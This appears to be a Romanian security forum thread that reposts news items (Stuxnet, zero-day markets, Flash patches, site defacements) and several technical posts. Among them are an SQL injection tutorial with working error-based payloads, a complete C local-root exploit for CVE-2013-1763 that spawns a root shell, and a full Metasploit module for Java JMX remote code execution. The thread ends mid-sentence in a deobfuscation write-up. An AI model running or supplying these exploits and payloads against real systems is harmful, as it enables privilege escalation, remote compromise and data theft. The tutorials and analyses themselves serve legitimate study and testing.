Nytro

Linux possible privilege escalation exploits Vad ca pe mailing list-uri apar tot mai multe fix-uri pentru NULL pointer dereference-uri sau alte probleme care pot duce la privilege escalation. Cateva: - oss-sec: CVE request: Linux kernel: USB: io_ti: NULL pointer dereference - oss-sec: CVE request - Linux kernel: VFAT slab-based buffer overflow - oss-sec: kernel: tmpfs use-after-free - oss-sec: CVE request - Linux kernel: evm: NULL pointer de-reference flaw - oss-sec: CVE request -- Linux kernel: net: CIPSO_V4_TAG_LOCAL tag NULL pointer dereference - oss-sec: CVE request -- Linux kernel: mm: thp: pmd_present and PROT_NONE local DoS - oss-sec: Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871) Va puteti uita peste ele. Nu e dificil sa mmap-ezi la o adresa corecta.

Story of a Cient-Side Attack 1. Introduction During an ethical hacking project the experts of Silent Signal LLC were mandated to elevate their privileges on the restricted workstations of the client. Taking into account the relatively strict host and network controls in place we decided to share some of our experiences gathered during the project. Naturally, in accordance with our contracts the identifying information about the client and other sensitive data was removed or changed. Download: www.exploit-db.com/download_pdf/24554

Am vazut ca a aparut azi Internet Explorer 10 si am zis sa ii fac o proba. Prima proba: SunSpider JavaScript Benchmark Rezultate: 1. Internet Explorer 10.0.9200 (Total: 112.4ms +/- 0.7%) 2. Google Chrome 25.0.1364 (Total: 154.3ms +/- 1.6%) 3. Mozilla Firefox 19.0 (Total: 183.3ms +/- 1.3%) Asta doar ca sa atrag atentia "haterilor" Revin cu mai multe daca am timp sa mai testez.

DOUBLE QUERY INJECTIONS DEMYSTIFIED Audi-1 February 27, 2013 In the last article of the series, we started to explore the world of SQL injections by discussing different types and using the test bed available at https://github.com/Audi-1/sqli-labs. You can review the last post here. Now, we will explore SQL injections even further and discuss Error based Double query injections, which are sometimes called sub query injections. Some people also refer to them as blind injections but I prefer to call them error based, as we would be using the errors to dump out the information to us. This would also go along the classification scheme we discussed in part1. I will be using the first post as a base and refer to it to explain the next part. For this post, we will use Less-5 and Less-6 of the SQLI-LABS test bed. Let’s start with the same enumeration process as discussed in the last article and see how it goes from there. We observe that the Less-5 and Less-6 look similar to the earlier lessons but with a very subtle difference. In earlier lessons, we were getting back username and password on the screen, but here we only get the message “You are in………” Even if we iterate over the parameter ID with values from 1 to 14 we get same response. ANALYSIS OF THE ENUMERATION ID=1 => You are in……… ID=2 => You are in……… ID=3 => You are in……… ID=4 => You are in……… ID=5 => You are in……… ID=6 => You are in……… ID=7 => You are in……… ID=8 => You are in……… ID=9 => You are in……… ID=10 => You are in……… ID=11 => You are in……… ID=12 => You are in……… ID=13 => You are in……… ID=14 => You are in……… ID=15 => no output ID=0 => no output ID=99 => no output ID=string => no output RESULT OF ENUMERATION: The application has 14 different entities; it returns “You are in…” on a valid entity, but returns a blank response on an invalid entity. FUZZING: As explained in the previous article, we fuzz the application to see if we are able to get traces of injection possibilities and find out how the application reacts to our malicious inputs. Integer or String test: Because the input looks to be integer type, therefore we try to test if the input is a real integer or if it also accepts string. For this, we try to inject a string into the parameter ID and examine the response. We observe that the application does not crash but it treats the string input similar to non existent values. Some other injections could be as follows: ‘ “ \ ; %00 ) ( aaa Using these, we observe that our application crashes, giving out a MySQL error. Less-5 http://localhost/sqli-labs/Less-5/?id=1‘ Less-6 http://localhost/sqli-labs/Less-6/?id=1? So by injecting a single quote, we observe that Less-5 produces a MySQL error whereas Less-6 Does not. The reverse happens if we inject double quotes instead: http://localhost/sqli-labs/Less-5/?id=1? http://localhost/sqli-labs/Less-6/?id=1“ IMPORTANT NOTE: From enumeration and the fuzzing process, we learned that the database is not reflecting back any output to the webpage, therefore we cannot use the UNION SELECT to dump the database information. The only information we see reflecting back from the database on the webpage is in the form of MySQL errors. Therefore, we need to craft our queries in such a way that we are able to dump the database information through errors. The criteria for the query is that it’s syntactically correct and accepted by db driver and passed on to the backend database for execution. This query should then produce a logical error and dump information as an error string with the error returned. (Confused? Don’t worry, we will clear it shortly) Guessing the Query: From the fuzzing we did, we learned some useful information about the application. Now it’s time to guess the backend query. We observed that the Less-5 produces an error with the addition of a single quote, and Less-6 produces an error with the addition of double quotes. To assure ourselves that only quotes or double quotes are used to wrap around the variable in original query, we try to break the application with the addition of the escape character \. Less-5 http://localhost/sqli-labs/Less-5/?id=1\ On Less-5, let’s look at the part of the error dumped on the screen containing 1\, which is near ‘ ’1\’ LIMIT 0,1? at line 1. We observe that, with our input of 1\, a single quote is visible after that, indicating that single quotes are used as a wrapper for the strings. Less-6 http://localhost/sqli-labs/Less-6/?id=1\ On Less-6, let’s look at the part of the error dumped on the screen containing 1\, which is near ‘ “1\” LIMIT 0,1? at line 1. We observe that, with our input of 1\, a double quote is visible after that, indicating that only double quotes are used as a wrapper for the strings. COMMENTING OUT REST OF QUERY Since we discovered that Less-5 uses single quotes as string boundaries, we now inject a quote by adding comments at the end to fix the query. ID=1 ‘ –+ For Less-6, we can use this injection to fix the query. ID=1? –+ Therefore, after effective guessing, the query would be: Less-5 SELECT * FROM table_name WHERE ID=’Value we inject’ LIMIT 0,1 Less-6 SELECT * FROM table_name WHERE ID= “Value we inject” LIMIT 0,1 UNDERSTANDING SUBQUERIES: Before we proceed further with SQL injection, we need to understand the basics of subqueries. Subqueries can be defined as putting a query inside an existing query, or cascading one query inside another. The objective is to dynamically produce the result of the inner query and then get the result of the final query. Let’s try to understand it with an example. Select concat((select database())); In the above query, the blue part is the internal or sub query which gets evaluated first, and whose result is then passed to the concat function. This returns a string equivalent to the current selected database name which is then evaluated by the outer red colored Select keyword. This part evaluates a string (constant) which is actually name of the currently used database. SQL INJECTIONS In this type of query injections, we will be using specific functions available to the backend database. If you are not familiar with them, please look them up before proceeding. 1. Rand() 2. Floor() 3. Count() 4. Group by clause Some great researchers figured out that using Group by clause along with an aggregate function like count( * ) produced an error message dumping a part of the query as an error message, which henceforth evolved double query injections. Let us start with basic building blocks and proceed to build a complete and complex query. We will perform these experiments on the MySQL client and directly interact with the database to understand the concepts. #mysql -u root –p toor (toor is default password of the MySQL root account on backtrack; change it as per your deployment.) mysql> use security; – Name of our database mysql> SELECT concat((select database()));– Dumps out current database name as string mysql> SELECT concat(‘string1?,’string2?); – Dumps out the two strings as one big string. (Note: It does not matter if you use single quotes or double quotes to wrap your query. Now let us look at the functions mentioned above in the article. Mysql> Select rand(); – Returns a random value less than 1 every time it is run. Mysql> Select floor(1.1123456); – Returns an integer value and discards all decimal values by default. We can now group these functions together. mysql>SELECT floor(rand()*2); – Create a random value, multiply it by 2 and then floor it to get the result. This would be either 0 or 1. Try it couple of times and see for yourself. Now let us combine the things we learned so far to make some useful output. Let’s execute the following query: Mysql>SELECT CONCAT((SELECT database()), FLOOR(RAND()*2)); Analyzing the query: We have here a nested query in which we wrapped a query inside another one. When this query executes, it first evaluates SELECT DATABASE(), along with RAND()*2, whose output is used in FLOOR(), thereafter concatenating the output, giving a string which ends with 0 or 1. Now if we query this string against any standard database table from MySQL, it will return SECURITY0 or SECURITY1 randomly. Be the first to hear of new free tutorials, training videos, product demos, and more. We'll deliver the best of our free resources to you each month, sign up here: Now let’s add the GROUP BY function to the query. This time, let’s try to use information_schema.tables or information_schema.columns tables to dump the results. The columns table would dump some 100+ entries which are good to check the random output. This group by clause hands us the distinct entries from the column. mysql> select concat((select database()), floor(rand()*2))as a from information_schema.tables group by a; The label or alias “a” is added to display the Column name as “a” which can be referenced by GROUP BY Clause. IMPORTANT: Henceforth, the inner query SELECT database() can be replaced by any other query which we would like to get as a string output in MySQL error, such as SELECT version(), user(), datadir() or complete enumeration of the columns, tables or other databases as discussed in part 1. Time to get the magic going. mysql> select count( * ), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a; Gets us an error which has our string as part of error: ERROR 1062 (23000): Duplicate entry ‘security1? for key ‘group_key’ Kudos again to all those brilliant minds who found the deadly combination of Aggregate function with Group by clause and the repeating values that makes a syntactically correct query which when executed produces a runtime error. Let us try to change the inner query to test something else. mysql> select count( * ), concat((select version()), floor(rand()*2))as a from information_schema.tables group by a; Some fancy inputs can be concatenated to distinguish a trailing 0 or 1 from our string. mysql> select count(*), concat(‘~’,(select user()),’~', floor(rand()*2))as a from information_schema.tables group by a; Error: ERROR 1062 (23000): Duplicate entry ‘~root@localhost~1? for key ‘group_key’ Let us try to implement this logic through the front end web application. But before we proceed there, we need to look at another aspect called Derived table. The complete query we used above to produce an error can be used as a table name in a query, something like: select 1 from (table name); Why we need to do this, you can easily follow the explanations from the video lessons below, which includes a complete walk through of this article: mysql> select 1 from (select count(*), concat(‘~’,(select user()),’~', floor(rand()*2))as a from information_schema.tables group by a)x; ERROR 1062 (23000): Duplicate entry ‘~root@localhost~0? for key ‘group_key’ http://localhost/sqli-labs/Less-5/?id=1?+AND+(select+1+from+(select+count( * ),+concat(‘~’,(select+user()),’~',+floor(rand()*2))as+a+from+information_schema.tables+group+by+a)x)–+ Replacing the internal query with what we want to extract gets us our output in the form of MySQL errors. Sursa: http://resources.infosecinstitute.com/double-query-injections-demystified/

[h=1]Stuxnet Missing Link Found, Resolves Some Mysteries Around the Cyberweapon[/h] By Kim Zetter 02.26.13 12:40 PM Iranian President Mahmoud Ahmadinejad touring the Natanz enrichment facility in April 2008 during the time that Stuxnet is already believed to have been unleashed on computers in Iran. Photo courtesy of the Iranian president’s office As Iran met in Kazakhstan this week with members of the UN Security Council to discuss its nuclear program, researchers announced that a new variant of the sophisticated cyberweapon known as Stuxnet had been found, which predates other known versions of the malicious code that were reportedly unleashed by the U.S. and Israel several years ago in an attempt to sabotage Iran’s nuclear program. The new variant was designed for a different kind of attack against centrifuges used in Iran’s uranium enrichment program than later versions that were released, according to Symantec, the U.S-based computer security firm that reverse-engineered Stuxnet in 2010 and also found the latest variant. The new variant appears to have been released in 2007, two years earlier than other variants of the code were released, indicating that Stuxnet was active much earlier than previously known. A command-and-control server used with the malware was registered even earlier than this, on Nov. 3, 2005. Like three later versions of Stuxnet that were released in the wild in 2009 and 2010, this one was designed to attack Siemens PLCs used in Iran’s uranium enrichment program in Natanz. But instead of changing the speed of spinning centrifuges controlled by the PLCs, as those later versions did, this one focused on sabotaging the operation of valves controlling the flow of uranium hexafluoride gas into the centrifuges and cascades — the structure that connects multiple centrifuges together so that the gas can pass between them during the enrichment process. The malware’s goal was to manipulate the movement of gas in such a way that pressure inside the centrifuges and cascade increased five times the normal operating pressure. “That would have very dire consequences in a facility,” says Liam O’Murchu, manager of security response operations for Symantec. “Because if pressure goes up, there’s a good chance the gas will turn into a solid state, and that will cause all sorts of damage and imbalances to the centrifuges.” The new finding, described in a paper released by Symantec on Tuesday (.pdf), resolves a number of longstanding mysteries around a part of the attack code that appeared in the 2009 and 2010 variants of Stuxnet but was incomplete in those variants and had been disabled by the attackers. The 2009 and 2010 versions of Stuxnet contained two attack sequences that each targeted different models of PLCs made by Siemens being used in Iran’s uranium enrichment plant — the Siemens S7-315 and S7-417 models of PLC. In these later variants of Stuxnet, however, only the 315 attack code worked. The 417 attack code had been deliberately disabled by the attackers and was also missing important blocks of code that prevented researchers from determining definitively what it was designed to do. As a result, researchers have long guessed that it was used to sabotage valves, but couldn’t say for certain how it affected them. There were also mysteries around why the attack code was disabled — was it disabled because the attackers had failed to finish the code or had they disabled it for some other reason? The 2007 variant resolves that mystery by making it clear that the 417 attack code had at one time been fully complete and enabled before the attackers disabled it in later versions of the weapon. And because the 2007 variant only contained the 417 attack code — with no code attacking the Siemens 315 PLC — it appears that the attackers disabled the 417 code in later versions because they wanted to change their tactics, dropping their focus on sabotaging the valves in order to focus instead on sabotaging the spinning centrifuges. Sursa[complet]: Stuxnet Missing Link Found, Resolves Some Mysteries Around the Cyberweapon | Threat Level | Wired.com

[h=2]Black hat greed reducing software vulnerability report rate[/h] Zero-day market temptation: Cash out or collaborate? By Iain Thomson in San Francisco RSA 2013 HP has kicked off the round of reports that accompany each RSA conference with its analysis of security vulnerabilities, and has revealed that although the overall trend is positive, the growing market for zero-day flaws is reducing the number of the most serious problems that are disclosed. The long-term trend looks pretty good, but... The number of software vulnerabilities has continued its overall downward trend from its 2006 peak, but while the numbers of the most critical threats hasn't fallen much, HP researchers have seen a reduction in the number of serious vulnerabilities that are actually reported. HP attributes that slippage to the growing market for vulnerability data. "We think a lot of these vulnerabilities are being sold in the black market or the grey one," Mark Painter, marketing manager for Fortify HP enterprise security, told The Register. "The growth of the grey market and the worth of vulnerabilities in dollars must have a reducing effect on the number of public disclosures that we see," Painter told us. "Those dollars are there, and anything that goes down [the grey channel] doesn't become public." Four of the six most common vulnerabilities are aimed primarily or solely at web applications: SQL injection, cross-site scripting, cross-site request forgery, and remote file inclusion. Together these account for 4 per cent of the total. On the mobile front, the HP team tested a very small sample of 70 apps and found a host of problems. Over 37 per cent of applications had passwords that could be beaten using basic methods (such as Apple's latest passcode-bypass woes), and 77 per cent had information-leakage flaws. There was a relatively low rate for XSS vulnerabilities in mobile, with an unlucky 13 per cent of mobile apps at risk, but the data showed a worrying preponderance of financial and database management apps in the sample. Elsewhere, HP reported a huge increase in the number of SCADA (supervisory control and data acquisition) vulnerabilities detected, the numbers of which have risen 68 per cent over the last five years. This likely reflects that people are more actively looking for such things post-Stuxnet, rather than any inherent instability in SCADA code. ® Sursa: Black hat greed reducing software vulnerability report rate • The Register

[h=2]Adobe squashes TWO critical Flash vulnerabilities with emergency patches[/h] Two out of three threats are dangerous, being used in wild By Jack Clark in San Francisco Adobe published a critical Flash Player update on Tuesday to fix three exploits, two of which are under active attack by hackers. Two of the three vulnerabilities are being used by nefarious folk, Adobe said, and one of these two explicitly targets the Firefox browser. Adobe introduced the Flash Player sandbox a year ago to protect Firefox users from vulnerabilities in Flash. It appears this is now being targeted for permission escalation attacks. "Adobe is aware of reports that CVE-2013-0643 and CVE 2013-0648 are being exploited in the wild in targeted attacks designed to trick the user into clicking a link which directs to a website serving malicious Flash (SWF) content," the company wrote in a security bulletin. Adobe classified the update with a priority rating of 1 (do it now if you value your computer) for Windows and Macintosh systems, and 3 (install at your discretion) for Linux kit. Google and Microsoft are applying automatic fixes to the integrated Adobe Flash Player code found in Chrome and in Internet Explorer 10 for Windows 8. The updates resolve a permissions issue with the Flash Player Firefox sandbox (CVE-2013-0643), a vulnerability in the ExternalInterface ActionScript feature (CVE-2013-0648), and a buffer overflow vuln in the Flash Player broker service (CVE-2013-0504). Links to download the fix are available from Adobe's website, as listed in the security bulletin. The timing of the patch jars with Adobe's as-of-November-2012 commitment to try and issue security patches in a more measured pattern that coincides with Microsoft's Patch Tuesday. ® Sursa: Adobe squashes TWO critical Flash vulnerabilities with emergency patches • The Register

Kernel Attacks Through User-Mode Callbacks Authored by Tarjei Mandt In this paper, the author discusses the many challenges and problems concerning user-mode callbacks in win32k. In particular, they show how win32k's dependency on global locks in providing a thread-safe environment does not integrate well with the concept of user-mode callbacks. Although many vulnerabilities related to user-mode callbacks have been addressed, their complex nature suggests that more subtle flaws might still be present in win32k. Thus, in an effort to mitigate some of the more prevalent bug classes, they conclusively provide some suggestions as to how users may protect themselves against future kernel attacks Download: http://dl.packetstormsecurity.net/papers/win/mandt-win32k-paper.pdf Sursa: Kernel Attacks Through User-Mode Callbacks ? Packet Storm

Today the vast majority of ATMs worldwide use a Microsoft Windows OS, primarily Windows XP Professional or Windows XP Embedded.[citation needed] A small number of deployments may still be running older versions of Windows OS such as Windows NT, Windows CE, or Windows 2000. Automated teller machine - Wikipedia, the free encyclopedia

[h=1]Atac cibernetic asupra a 60 de siteuri din Romania de un hacker sirian[/h] [h=3]Un hacker din Siria a atacat cibernetic peste 60 de site-uri române?ti, din motive politice.[/h] Omar Salloum, sau Syrian StOrm (Furtuna Sirian?) cum se intituleaz? pe Facebook, s-a autodenun?at pe re?eaua de socializare c? a spart (a hackuit) peste 60 de siteuri din România, aparent aleatoare, sup?rat fiind de pozi?ia politic? a Guvernului României fa?? de ?ara sa. Guvernul României condamn? recentele ac?iuni agresive ale Siriei ?i este de p?rere c? se încalc? dreptul interna?ional ?i este pus? în pericol stabilitatea ?i securitatea regional?. România are de partea ei Turcia, care împarte acelea?i opinii politice. Presa interna?ional? sus?ine faptul c? acest conflict din Siria este alimentat ?i organizat de for?e str?ine, cu ajutorul "terori?tilor" care colaboreaz? cu re?eaua Al-Qaida, afirm? pre?edintele sirian, Bashar al-Assad, în primul discurs televizat din ultimele trei luni, informeaz? Mediafax. Iat? care sunt site-urile care au fost h?ckuite de sirian: .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Valcea 1 - Televiziunea de Valcea GAL Valea Tutovei si Zeletinului | Just another WordPress site .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. WileyX Romania Servicii psihoterapie Iasi .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. http://valseb.ro/ Hosting account suspended Usi Porta Doors .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Lisa Shop | Lisa Accessories Lifecoaching, Simon Eniko, trainer, curs reiki, pictura pe matase Actualitatea Online | Saptamanal pentru oameni inteligenti | Lugoj .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. ArhivaFoto.ro - Banca de fotografii http://primarianecsesti.ro/ Pronosticuri sportive profesioniste .:: Hacked by Th3 Syrian St0rm ::. V for Verde — Bucur?-te de via??! .:: Hacked by Th3 Syrian St0rm ::. http://tryonemanshow.eu/ Unitate In Romania .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. http://uberuan.ro/ .:: Hacked by Th3 Syrian St0rm ::. Transport MVO Avocat Eugen Preda is coming soon Hosting account suspended http://vorwerk-thermomix.ro/ http://bionek.ro/ thermomix ... site-ul oficial thermomix - Romania http://terapieacasa.ro/ http://terapia-naturista.ro/ Centrul Vywamus Romania Hosting account suspended Mesaje de dragoste,iubire,noapte buna,la multi ani etc. http://regen.ro.im/ http://steauadiminetii.ro/ .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Totul despre stil .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Home: www.denic.de .:: Hacked by Th3 Syrian St0rm ::. SkirtBike Baia Mare - Nu va plangeti de stire, vine de la Atac cibernetic asupra a 60 de siteuri din Romania de un hacker sirian Si mai ciudat e ca am gasit-o via ProSport

Archlinux: // archer.c // // 2012 sd@fucksheep.org // // Works reliably against x86-64 3.3-3.7 arch. // // Tested against: // // Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux // Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux // Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux // ... #include <assert.h> #define JUMP 0x0000100000001000LL #define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 static long ugid; void patch_current() { int i,j,k; char *current = *(char**)(((long)&i) & (-8192)); long kbase = ((long)current)>>36; for (i=0; i<4000; i+=4) { long *p = (void *)&current[i]; int *t = (void*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j=0; j<20; j++) { for (k = 0; k < 8; k++) if (((int*)&ugid)[k%2] != t[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < 10; i++) t[j+9+i] = -1; return; next:; } } } int main() { long u = getuid(); long g = getgid(); int i, f = socket(16,3,4); static int n[10] = {40,0x10014,0,0,45,-1}; assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1); setresuid(u,u,u); setresgid(g,g,g); ugid = (g<<32)|u; memcpy(1<<12, &patch_current, 1024); for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current; send(f, n, sizeof(n), 0); setuid(0); return execl("/bin/bash", "-sh", 0); } Sursa: oss-sec: Archlinux/x86-64 3.1.x-3.7.x x86-64 CVE-2013-1763 sock_diag_handlers[] warez

Discover Contacts And Domains With Recon-ng Automation is really important in penetration testing engagements because it can help the penetration tester to save time and to give more attention to other activities.For that reason many pen testers are putting effort to build tools to assist them with a variety of tasks.Such a tool is the recon-ng which can perform web-based reconnaissance and it can be used in social engineering engagements or for extracting information that exists on the web.In this article we will examine how we can use the Recon-Ng framework to discover different type of information. We can type help in the framework in order to see a list with all the available commands. recon-ng – commands We can see that there is a command named modules.We will type that command to check the existing modules that we can use.In the next image you can see a sample of the available modules. recon-ng – sample of the available modules There is a module called contacts_jigsaw.Jigsaw is a website similar to Linkedin that contains a large database of business contacts.So let’s say that we want to discover the contacts of a company that exists on jigsaw.We will load the module with the command load contacts_jigsaw and we will set the domain of our preference. load jigsaw module in the next image we can see a sample of the output: recon-ng – Gathering Contacts Now that we have some contacts we can try to use the Google module to discover additional domains of the same company. discover hosts via google In the image below we can see a sample of the results that recon-ng has produced. Discovering subdomains with recon-ng Recon-ng gives us also the ability to extract the results in CSV format or in an HTML file. Save the results in HTML file You can see in the next two images the output of the report: recon-ng – Report recon-ng report contacts Conclusion Recon-ng is a great framework that can help in the information gathering stage of a penetration test.This tool is really simple to use and it holds every result in its database for later use.The report that generates is well formatted and if in the future additional modules will added on the framework then it will included in every penetration tester toolkit. Sursa: Discover Contacts And Domains With Recon-ng | Penetration Testing Lab

[h=1]Java Applet JMX Remote Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet JMX Remote Code Execution', 'Description' => %q{ This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery and exploit in the wild 'Adam Gowdiak', # Vulnerability discovery 'SecurityObscurity', # Exploit analysis and deobfuscation 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-0431' ], [ 'OSVDB', '89613' ], [ 'BID', '57726' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ], [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ], [ 'URL', 'http://pastebin.com/QWU1rqjf' ], [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 19 2013' )) end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i print_status("Sending JAR") send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } ) when /\/$/ print_status("Sending HTML") send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_jar paths = [ [ "Exploit.ser" ], [ "Exploit.class" ], [ "B.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end return jar.pack end def generate_html html = <<-EOF <html> <script language="Javascript"> var _app = navigator.appName; if (_app == 'Microsoft Internet Explorer') { document.write('<applet archive="#{rand_text_alpha(4+rand(4))}.jar" object="Exploit.ser"></applet>'); } else { document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>'); } </script> </html> EOF return html end end Sursa: Java Applet JMX Remote Code Execution

Cracking the Defender: The Deobfuscated Code Dejan Lukan February 25, 2013 Introduction So far we’ve taken a look at the obfuscation routine and how it deobfuscates the instructions in the loc_4033D1. At the beginning point, the overview navigator will look like it shown on the picture below: Upon executing the program, new functions will be discovered because the code is deobfuscated. The new overview navigator will look like this: We can see that there are additional blue regions that correspond to functions. Additionally, there is also more instructions (brown area) rather than data items (grey area); this is because the data instructions were changed into the code instructions as a result of a code deobfuscation. We’ve also already determined that the deobfuscated instructions are from 0x004034DD – 0x004041FD with occasional data elements. Analyzing Deobfuscated Code The first instructions of the deobfuscated code are presented on the picture below: The first instruction loads the previously saved base address of the ntdll.dll library into register eax and then stores it at stack the offset location [ebp – 50]. The same value 0x7C900000 is then stored into the ecx register and the value stored at [0x7C90003C] is added to 0x7C900000. Let’s take a look at which value is located at the address 0x7C90003C; we can see that on the picture below: it’s 0x000000D0. So the value in the ecx register that’s later stored at the [ebp-58] is 0x7C9000D0. What just happened? It appears that the program has just read some value from the ntdll.dll library’s header (notice the “This program cannot be run in DOS mode” on the picture above – this is a clear indication that we’re looking at the PE executable file: either exe or dll: in this case this is ntdll.dll DLL file). Then we can also apply the IMAGE_DOS_HEADER to the ntdll.dll. We can do that by first going to the Structures window and pressing the Insert key, which will open the following pop-up dialog: We need to click on the “Add standard structure” button and select the IMAGE_DOS_HEADER structure, as seen on the picture below. After adding that structure, we can apply it to the various memory locations in Ida’s database. Now we need to apply that structure to the base address of the ntdll.dll file by going to its base address 0x7C900000 and clicking on the Edit – Struct var, selecting IMAGE_DOS_HEADER and pressing OK. After that, we must also expand the structure at the 0x7C900000 location by pressing the ‘+’ key. The applied structure can be seen on the picture below: Now the values in the structure have comments that correspond to the actual members of the structure; we no longer only have some bytes that don’t mean anything, but have the comments appended and we immediately know what each byte means. Let’s also take a look at the corresponding bytes, presented in the hex view: We can see that the bytes in the hex view and in the disassembly view are exactly the same. We must keep in mind that the db means 1 byte, dw 2 bytes and dd 4 bytes. The only weird thing is the “dw 4 dup(0)”, which means that we’re operating with an array that has 4 elements all initialized at 0 and every element is 2 bytes in size (hence the dw); this means that the total size of the array is 8 zero bytes. If we calculate the bytes from the hex view, we can see that their number actually corresponds to the disassembly view. The bytes that we’re interested at address 0x7C90003C, which are the “dd 0D0h” bytes, means that we have 4 bytes where 3 bytes are 0×00 and the last byte is 0xD0. These bytes correspond to the e_lfanew entry in the DLL header. If we Google what this field means, we’ll find an explanation that the e_lfanew is a 4-byte offset into the file where the PE file header is located. This field is used to find the PE file header in the DLL file, which occurs soon after that MSDOS header. We’ve just found out that the PE header is located at the offset 0×30, which means that we can apply the IMAGE_NT_HEADERS structure the same way as we did before with the IMAGE_DOS_HEADER structure to the address 0x7C9000D0. If we do that we’ll get the following comments which explain the PE header structure in detail: So the initial code segment, located at address 0x004034E5, is loading the address of the PE header of the ntdll.dll file into the register ecx and later to the [ebp-58h] location. Let’s present the picture again, just to be clear about that. Now let’s take a look at the next piece of code presented on the picture below: We can see that we’re loading the address 0x7C9000D0 into register eax and address 0x7C900000 into register ecx and then adding the value stored at address 0x7C9000D0+0×78 to the ntdll base address. The actual address we’re accessing is the 0x7C900148. That address is presented on the picture below (never mind that the actual address isn’t right, this is just how Ida presents the addresses where we’ve applied structures too: all have the same address as the base address of the structure): This means that we’re adding the value 0×3400 to the value 0x7C900000, which makes the 0x7C903400 address. After that, we’re also storing the same value into the [ebp-48h] and into the eax register. The next thing that happens is we’re adding the value at 0x7C903420 to 0x7C900000 and storing the result into ecx. The value at 0x7C903420 address holds the value 0x48B8, which is presented below: This means that we’re storing the value 0x7C9048B8 into the [ebp-4Ch]. In the next step, we’re also reading the value 0×3428 from the picture above and storing the address 0x7C903428 it into the [ebp-54h]. Here we can see that we’re comparing the value from [ebp-6Ch] to the 0x39DBA17A constant. If the value is not equal, we’re jumping to loc_4035F1, which consequentially jumps back to loc_40352D. The value in the [ebp-6Ch] is being calculated right before that code, and is presented on the picture below: We can see that we’re taking the value from [ebp-68h], decreasing it by 1 and storing it at the same location. When that location contains the value 0, we’re breaking out of the loop and jumping to the loc_4035D0 location, which was presented on the previous picture that compares the value at [ebp-6Ch] to constant 0x39DBA17A. We won’t go into details about this function, but we must keep in mind that this is the function that calculates the checksum of the ntdll’s export function and then compares it to the 0x39DBA17A constant below. Rather than evaluating this instruction by instruction, we can set the breakpoint at the 0x004035E9 instruction, which calculated the exact address of the function we’re looking for and is only accessible when the checksum matches. The picture below presents the registers after executing that instruction: It’s clear from the picture above that the program calls the NtAllocateVirtualMemory function from the ntdll.dll library file. The address of that function is stored at the 